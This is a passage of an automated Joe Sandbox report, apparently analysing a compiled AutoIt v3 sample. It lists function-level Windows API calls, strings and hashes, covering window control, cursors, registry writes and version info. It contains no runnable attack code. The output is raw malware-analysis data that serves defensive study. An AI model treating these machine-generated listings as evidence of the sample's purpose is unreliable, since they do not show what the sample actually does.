                                                                    • Opcode Fuzzy Hash: 32e06d26a3d5e68fdac73fb9e3d0de535d91cef4eed8a8e26725e23048d06e1b
                                                                    • Instruction Fuzzy Hash: 56512C71900208BFDB10AFA4DC48EEEBB7AEB09324F105515F916AB2E1D775AA40DF60
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0068B7B0
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0068B7C1
                                                                    • CharNextW.USER32(0000014E), ref: 0068B7F0
                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0068B831
                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0068B847
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0068B858
                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0068B875
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0068B8C7
                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0068B8DD
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0068B90E
                                                                    • _memset.LIBCMT ref: 0068B933
                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0068B97C
                                                                    • _memset.LIBCMT ref: 0068B9DB
                                                                    • SendMessageW.USER32 ref: 0068BA05
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0068BA5D
                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 0068BB0A
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0068BB2C
                                                                    • GetMenuItemInfoW.USER32(?), ref: 0068BB76
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0068BBA3
                                                                    • DrawMenuBar.USER32(?), ref: 0068BBB2
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0068BBDA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                    • String ID: 0
                                                                    • API String ID: 1073566785-4108050209
                                                                    • Opcode ID: 610cfce2d18a341260b8a21e37695c88f1b3ad1650715659b66f86836ed9ede2
                                                                    • Instruction ID: ca1553de6b0a59492b03b21cd55975f6c89ecd47d52b4f03bce4eda13f428ffa
                                                                    • Opcode Fuzzy Hash: 610cfce2d18a341260b8a21e37695c88f1b3ad1650715659b66f86836ed9ede2
                                                                    • Instruction Fuzzy Hash: F1E1C374900219AFDF20EF65CC84EEE7B7AFF05710F14925AF919AA290DB709A41DF60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Foreground
                                                                    • String ID: ACTIVE$ALL$CLASS$H+m$HANDLE$INSTANCE$L+m$LAST$P+m$REGEXPCLASS$REGEXPTITLE$T+m$TITLE
                                                                    • API String ID: 62970417-213249025
                                                                    • Opcode ID: 43e4070b8a11b7b8030bb4b0ff32edddda1cf2b6a4f3fc9bd0426a4d15922f0a
                                                                    • Instruction ID: b128e841a83312ba81a36f779284e98851a672cf067ad369359f9e8eadfe2aba
                                                                    • Opcode Fuzzy Hash: 43e4070b8a11b7b8030bb4b0ff32edddda1cf2b6a4f3fc9bd0426a4d15922f0a
                                                                    • Instruction Fuzzy Hash: C1D1F530504643BBCF44EF20D4A19EABBABBF64304F104A1DF45657AA1DB30E99ACF95
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 0068778A
                                                                    • GetDesktopWindow.USER32 ref: 0068779F
                                                                    • GetWindowRect.USER32(00000000), ref: 006877A6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00687808
                                                                    • DestroyWindow.USER32(?), ref: 00687834
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0068785D
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068787B
                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006878A1
                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 006878B6
                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006878C9
                                                                    • IsWindowVisible.USER32(?), ref: 006878E9
                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00687904
                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00687918
                                                                    • GetWindowRect.USER32(?,?), ref: 00687930
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00687956
                                                                    • GetMonitorInfoW.USER32 ref: 00687970
                                                                    • CopyRect.USER32(?,?), ref: 00687987
                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 006879F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                    • String ID: ($0$tooltips_class32
                                                                    • API String ID: 698492251-4156429822
                                                                    • Opcode ID: 8dde4e9266fc202ba502f86e2de4c103d77351dbfbbf526d2e01d55ce33ef17b
                                                                    • Instruction ID: d2c19579ae2a43c4e60fae7686a0e1f00d7f79db7d297db5583c1e05096f8272
                                                                    • Opcode Fuzzy Hash: 8dde4e9266fc202ba502f86e2de4c103d77351dbfbbf526d2e01d55ce33ef17b
                                                                    • Instruction Fuzzy Hash: 9EB1B171608301AFDB44EF64C848B5ABBE6FF89310F108A1DF59A9B291D770E805CFA5
                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00666CFB
                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00666D21
                                                                    • _wcscpy.LIBCMT ref: 00666D4F
                                                                    • _wcscmp.LIBCMT ref: 00666D5A
                                                                    • _wcscat.LIBCMT ref: 00666D70
                                                                    • _wcsstr.LIBCMT ref: 00666D7B
                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00666D97
                                                                    • _wcscat.LIBCMT ref: 00666DE0
                                                                    • _wcscat.LIBCMT ref: 00666DE7
                                                                    • _wcsncpy.LIBCMT ref: 00666E12
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                    • API String ID: 699586101-1459072770
                                                                    • Opcode ID: ca591c41f0e0d8c7f066c5ec7eaabcdaf7decbaa12184edc4ed18d880445bc7f
                                                                    • Instruction ID: 293b490d8afda67734e7590b9da3aabb7dd8231edad51a72b9b7796025c1a920
                                                                    • Opcode Fuzzy Hash: ca591c41f0e0d8c7f066c5ec7eaabcdaf7decbaa12184edc4ed18d880445bc7f
                                                                    • Instruction Fuzzy Hash: 1241D571A00211BBEB40AB64DD47EFF777EDF51710F140029FA05A6282EB75EA0196AA
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0063A939
                                                                    • GetSystemMetrics.USER32(00000007), ref: 0063A941
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0063A96C
                                                                    • GetSystemMetrics.USER32(00000008), ref: 0063A974
                                                                    • GetSystemMetrics.USER32(00000004), ref: 0063A999
                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0063A9B6
                                                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0063A9C6
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0063A9F9
                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0063AA0D
                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 0063AA2B
                                                                    • GetStockObject.GDI32(00000011), ref: 0063AA47
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0063AA52
                                                                      • Part of subcall function 0063B63C: GetCursorPos.USER32(000000FF), ref: 0063B64F
                                                                      • Part of subcall function 0063B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0063B66C
                                                                      • Part of subcall function 0063B63C: GetAsyncKeyState.USER32(00000001), ref: 0063B691
                                                                      • Part of subcall function 0063B63C: GetAsyncKeyState.USER32(00000002), ref: 0063B69F
                                                                    • SetTimer.USER32(00000000,00000000,00000028,0063AB87), ref: 0063AA79
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                    • String ID: AutoIt v3 GUI
                                                                    • API String ID: 1458621304-248962490
                                                                    • Opcode ID: 2ac2ba779c2b58dd803daa154c2433c71a3ba11260cb1fe4703f6d6972d6e21f
                                                                    • Instruction ID: d8c400c91c650a01039a569bae300ec21d41b20da2019fdee1cfecbe1916d532
                                                                    • Opcode Fuzzy Hash: 2ac2ba779c2b58dd803daa154c2433c71a3ba11260cb1fe4703f6d6972d6e21f
                                                                    • Instruction Fuzzy Hash: F6B17D71A0020A9FDB14DFA8CC45BED7BBAFB09314F115229FA56AB290DB34E841DF51
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00683735
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,006BDC00,00000000,?,00000000,?,?), ref: 006837A3
                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006837EB
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00683874
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00683B94
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00683BA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 536824911-966354055
                                                                    • Opcode ID: 1ac19bfb9e97a4334aafb228b5e4badba2dc9bf7c28dc2b50f812a1e79fb6ada
                                                                    • Instruction ID: 1f58e0a711a975b672af35b5be2d10dc72caebd360456e625010f8b203117986
                                                                    • Opcode Fuzzy Hash: 1ac19bfb9e97a4334aafb228b5e4badba2dc9bf7c28dc2b50f812a1e79fb6ada
                                                                    • Instruction Fuzzy Hash: 59026A75604A219FCB54EF14D851A2AB7E6FF88720F04855DF98A9B3A1CB30ED01CF99
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00686C56
                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00686D16
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharMessageSendUpper
                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                    • API String ID: 3974292440-719923060
                                                                    • Opcode ID: c7e16bbb2b26e20101a36dc6130cbfaff81bed45f6d59526726728811ce5ed0d
                                                                    • Instruction ID: a9eb141fa511ed32e94b33cc3cf75a773ba3e1eec70df4fe851ee3a4e11fe80f
                                                                    • Opcode Fuzzy Hash: c7e16bbb2b26e20101a36dc6130cbfaff81bed45f6d59526726728811ce5ed0d
                                                                    • Instruction Fuzzy Hash: 9AA19E702043419BCB54FF20D851A6AB3A3BF54350F105A6DB9A6AB3D2DF30ED0ACB95
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0065CF91
                                                                    • __swprintf.LIBCMT ref: 0065D032
                                                                    • _wcscmp.LIBCMT ref: 0065D045
                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0065D09A
                                                                    • _wcscmp.LIBCMT ref: 0065D0D6
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0065D10D
                                                                    • GetDlgCtrlID.USER32(?), ref: 0065D15F
                                                                    • GetWindowRect.USER32(?,?), ref: 0065D195
                                                                    • GetParent.USER32(?), ref: 0065D1B3
                                                                    • ScreenToClient.USER32(00000000), ref: 0065D1BA
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0065D234
                                                                    • _wcscmp.LIBCMT ref: 0065D248
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0065D26E
                                                                    • _wcscmp.LIBCMT ref: 0065D282
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                    • String ID: %s%u
                                                                    • API String ID: 3119225716-679674701
                                                                    • Opcode ID: 74c0485a34f36b3d050455d5bd26f44e96e31e38f0bac4ccc6a3145e3cb2571f
                                                                    • Instruction ID: a0e7168f3cf76052d26429d8159c71396ee72446f6e3222456c9051adb34e34a
                                                                    • Opcode Fuzzy Hash: 74c0485a34f36b3d050455d5bd26f44e96e31e38f0bac4ccc6a3145e3cb2571f
                                                                    • Instruction Fuzzy Hash: F0A1C171604702AFD725DF64C884BEAB7AAFF44355F008519FE9AD22D0DB30EA49CB91
                                                                    APIs
                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0065D8EB
                                                                    • _wcscmp.LIBCMT ref: 0065D8FC
                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0065D924
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0065D941
                                                                    • _wcscmp.LIBCMT ref: 0065D95F
                                                                    • _wcsstr.LIBCMT ref: 0065D970
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0065D9A8
                                                                    • _wcscmp.LIBCMT ref: 0065D9B8
                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0065D9DF
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0065DA28
                                                                    • _wcscmp.LIBCMT ref: 0065DA38
                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0065DA60
                                                                    • GetWindowRect.USER32(00000004,?), ref: 0065DAC9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                    • String ID: @$ThumbnailClass
                                                                    • API String ID: 1788623398-1539354611
                                                                    • Opcode ID: df63e3f98c3371d7c7ea22db2afa42f11278ec4e9fcdba710eabdad9d4962a43
                                                                    • Instruction ID: 7c3a96993aed768ef1e42977507cadef27c8c198b18a77d5be13fa9702f4adf7
                                                                    • Opcode Fuzzy Hash: df63e3f98c3371d7c7ea22db2afa42f11278ec4e9fcdba710eabdad9d4962a43
                                                                    • Instruction Fuzzy Hash: C98191710083059BDB25DF10C885BAA7BEAEF85315F04446AFD899A1D6DB30ED49CBA1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                    • API String ID: 1038674560-1810252412
                                                                    • Opcode ID: 7e94e1700986a667f4a332df7e85463bfb269b37322a500b1f16f0f4e3008f0d
                                                                    • Instruction ID: 95a8314ccc36805381e9acd888e88548c36de7076847a3f1d7d6e517369da7b1
                                                                    • Opcode Fuzzy Hash: 7e94e1700986a667f4a332df7e85463bfb269b37322a500b1f16f0f4e3008f0d
                                                                    • Instruction Fuzzy Hash: C431B231944616EADB64EB50ED53EED73679F24755F20002EF841711D1EBA1AE08CA19
                                                                    APIs
                                                                    • LoadIconW.USER32(00000063), ref: 0065EAB0
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0065EAC2
                                                                    • SetWindowTextW.USER32(?,?), ref: 0065EAD9
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0065EAEE
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0065EAF4
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0065EB04
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0065EB0A
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0065EB2B
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0065EB45
                                                                    • GetWindowRect.USER32(?,?), ref: 0065EB4E
                                                                    • SetWindowTextW.USER32(?,?), ref: 0065EBB9
                                                                    • GetDesktopWindow.USER32 ref: 0065EBBF
                                                                    • GetWindowRect.USER32(00000000), ref: 0065EBC6
                                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0065EC12
                                                                    • GetClientRect.USER32(?,?), ref: 0065EC1F
                                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0065EC44
                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0065EC6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                    • String ID:
                                                                    • API String ID: 3869813825-0
                                                                    • Opcode ID: 5fbfc48893784648663ceb9ec7f5a11f2eafffc4cb3beea1c17265ef31acdf9e
                                                                    • Instruction ID: 9ecd5de1aa9ca5edbbf796a55532f4945aea1d801984af801a1ffcc4cbe4b1b2
                                                                    • Opcode Fuzzy Hash: 5fbfc48893784648663ceb9ec7f5a11f2eafffc4cb3beea1c17265ef31acdf9e
                                                                    • Instruction Fuzzy Hash: 76512F71900709AFDB24EFA8CE85BAEBBF6FF04705F004518E556A66A0D775B948CF10
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 006779C6
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 006779D1
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 006779DC
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 006779E7
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 006779F2
                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 006779FD
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00677A08
                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00677A13
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00677A1E
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00677A29
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00677A34
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00677A3F
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00677A4A
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00677A55
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00677A60
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00677A6B
                                                                    • GetCursorInfo.USER32(?), ref: 00677A7B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load$Info
                                                                    • String ID:
                                                                    • API String ID: 2577412497-0
                                                                    • Opcode ID: f055971f11dc8c63e4d0da41fa04df5866a48f1d160968e46b4c692fdaf5f949
                                                                    • Instruction ID: 98b3ea365ebc7a0397bf47ab056832b7e18f7daa26c7218e2d2d2205eee5c02b
                                                                    • Opcode Fuzzy Hash: f055971f11dc8c63e4d0da41fa04df5866a48f1d160968e46b4c692fdaf5f949
                                                                    • Instruction Fuzzy Hash: 123138B0D0831A6ADF509FB68C8999FBFE9FF04750F50453AE50DE7280DA78A5008FA1
                                                                    APIs
